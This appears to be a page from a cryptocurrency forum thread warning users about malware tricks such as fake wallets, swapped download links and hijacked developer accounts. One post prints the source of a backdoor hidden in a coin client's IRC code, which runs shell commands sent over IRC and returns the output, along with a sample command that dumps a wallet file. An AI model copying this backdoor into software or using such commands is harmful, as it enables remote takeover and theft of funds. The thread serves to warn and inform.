
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 18. (Read 837452 times)

newbie
Activity: 266
Merit: 0
Thanks for the information ...
But can you please give us the exact name of the coins ... Thank you !!!
newbie
Activity: 209
Merit: 0
Hello. My first wallet was hacked and now I am very cautious ... I have installed a firewall; will it help to protect my savings ...?
newbie
Activity: 98
Merit: 0
Thanks, this was very informative and informs us.
member
Activity: 125
Merit: 10
This information is so useful that we can secure the wallet from the virus that would cause a big problem later; therefore we should be able to find the right solution to prevent it by setting up good security ;)
member
Activity: 171
Merit: 10
In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or a wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
Here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // Trigger: any PRIVMSG whose text starts with "!". The rest of the raw
    // line, from the first occurrence of the fourth word, is run as a shell command.
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Reply target: the sender's nick, i.e. vWords[0] without the leading ':'
        // and cut at the '!' of "nick!user@host".
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // The command output is sent back to the sender as a PRIVMSG.
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Thanks for posting this.  There is always something that we have to look out for.
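The following is an added example, not code from the quoted post or from any coin's code base. It is a side-effect-free model of the trigger logic in the backdoored IRC handler: it reproduces the word splitting and string handling of the snippet, but returns the command that would have been handed to popen() and the nick that would receive the output instead of executing anything, so the behaviour can be studied and unit-tested safely. It assumes the client splits the raw IRC line on single spaces (the Bitcoin-era irc.cpp did this with ParseString(strLine, ' ', vWords)); the struct, function names and sample lines are all constructed here. Two details a reviewer would want to know are made explicit: vWords[4] is read without a size check in the original (a line with exactly four words reads out of bounds), and strstr() takes the first occurrence of the fourth word anywhere in the line, not the one after ":!".

```cpp
// Added example (not from the original post or any coin's source): a safe
// model of the backdoor trigger. Nothing here runs a command.
#include <cstdio>
#include <cstring>
#include <string>
#include <vector>

struct BackdoorTrigger {
    bool fires = false;       // would the backdoor branch execute?
    std::string command;      // text that would have been passed to popen()
    std::string replyNick;    // nick that would receive the command output
};

// Assumption: the client splits the raw line on single spaces, as
// ParseString(strLine, ' ', vWords) did; empty words are kept.
static std::vector<std::string> SplitWords(const std::string& strLine)
{
    std::vector<std::string> vWords;
    std::string cur;
    for (char c : strLine) {
        if (c == ' ') { vWords.push_back(cur); cur.clear(); }
        else cur += c;
    }
    vWords.push_back(cur);
    return vWords;
}

// Models: if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
// The original reads vWords[4] without checking the vector size; a line with
// exactly four words is undefined behaviour there and is reported as "no fire" here.
BackdoorTrigger ParseIrcBackdoorTrigger(const std::string& strLine)
{
    BackdoorTrigger t;
    std::vector<std::string> vWords = SplitWords(strLine);
    if (vWords.size() < 4) return t;
    if (!(vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)) return t;
    if (vWords.size() < 5) return t;   // original: out-of-bounds read of vWords[4]

    // popen(strstr(strLine, vWords[4])): the command is the remainder of the raw
    // line starting at the FIRST occurrence of the fourth word, wherever it is.
    const char* p = strstr(strLine.c_str(), vWords[4].c_str());
    if (p == NULL) return t;           // cannot happen (the word came from the line)
    t.command = p;

    // Reply target: vWords[0] minus the leading ':', cut at the first '!'.
    std::string nick = vWords[0].substr(1);
    std::string::size_type bang = nick.find('!');
    if (bang != std::string::npos) nick.resize(bang);
    t.replyNick = nick;
    t.fires = true;
    return t;
}

int main()
{
    // Constructed sample traffic, not captured from a real network.
    const char* lines[] = {
        ":alice!~a@host PRIVMSG #coin :hello everyone",                     // benign chat
        ":evil!~x@host PRIVMSG #coin :! cat ~/.coin/wallet.dat | base64",    // trigger
        ":evil!~x@host PRIVMSG #coin :!",                                    // malformed, vWords[4] missing
    };
    for (const char* l : lines) {
        BackdoorTrigger t = ParseIrcBackdoorTrigger(l);
        if (t.fires)
            std::printf("%s\n  -> would run: %s (output to %s)\n", l, t.command.c_str(), t.replyNick.c_str());
        else
            std::printf("%s\n  -> ignored\n", l);
    }
    return 0;
}
```

Because the trigger is pure string matching on inbound IRC traffic, the same function can be pointed at a saved IRC log to find out whether a node running the backdoored client was ever commanded, which a virus scan of the binary would never tell you.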
newbie
Activity: 3
Merit: 0
Very interesting read! Thanks!
newbie
Activity: 122
Merit: 0
Wow! Thanks for the info! Excellent data! Carefully study this subject, and I take my notes!
full member
Activity: 406
Merit: 106
Yeah, be careful what you are opening. I had a problem once and could hardly fix it. These malware infections are very dangerous. Every miner should know that.
newbie
Activity: 88
Merit: 0
Malicious software, or "malware" for short, is a broad class of software built with malicious intent. I will tell you how to identify it. A newbie asks for the latest wallet, or a wallet that doesn't have any TX fees, or the latest/fastest miner, and the attacker posts a program with malware embedded as a response. This type of attempt usually gets spotted pretty quickly. The attacker creates a new ANN topic and posts a malware link as the download file (or a legit one and changes it to a malware one later). The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link. Those were just examples of how they use it. So think before acting.
full member
Activity: 350
Merit: 107
It does seem to get worse.

But, the best thing you can do to start with in protecting your funds, is getting yourself a hardware wallet and storing tokens there. Avoid online wallets like MEW.
newbie
Activity: 196
Merit: 0
There must be an antivirus on the computer, and look at where you enter your data and passwords. In general, you need to be careful with your data.
newbie
Activity: 210
Merit: 0
Are there still scams in crypto, guys?? What are they like? Could you please post the website that is possibly a scam?? So I can be aware.
newbie
Activity: 8
Merit: 0
Thank you for posting this. Hope others would be informed and stay vigilant. Stay safe everyone.
full member
Activity: 406
Merit: 106
Thank you for the insightful information. I believe malware developers have this kind of platform as a target for obvious and selfish reasons.
newbie
Activity: 210
Merit: 0
Thank you for that😊😊
Please make our system more secure!! So no one can hack it and no keylogger can enter this forum 😇😇😊
newbie
Activity: 211
Merit: 0
I think it is a very terrible incident for us. Malware is one of the most useless viruses. It generally kills our phones, and a group hacks all of our privacy with it. Actually, we work hard for our own development, but this group hacks it within minutes, like a vampire feeding. This work is done by some indolent people who are interested in earning money dishonestly. For all these things, everyone should be aware of sophisticated malware infection attempts.
newbie
Activity: 210
Merit: 0
Will you post who this user is, or which website can have a keylogger, so I can warn my friends??
newbie
Activity: 2
Merit: 0
Yeah, be careful what you are opening. I had a problem once and could hardly fix it. These malware infections are very dangerous. Every miner should know that.
yes
member
Activity: 100
Merit: 12
Thank you very much! this was very informative. stay safe.
jr. member
Activity: 37
Merit: 2
I found this today. Post has since been removed but I managed to screenshot it beforehand and also left negative feedback. A link to the virus total results is included in the feedback.

It wasn't especially sophisticated, nor was it crypted, just basic wallet-stealing code that scans the PC for private keys. It seems to be targeted at noobs who would get greedy and download without thinking.

My god, this is just targeting people's greed. Always be wary of such a low blow.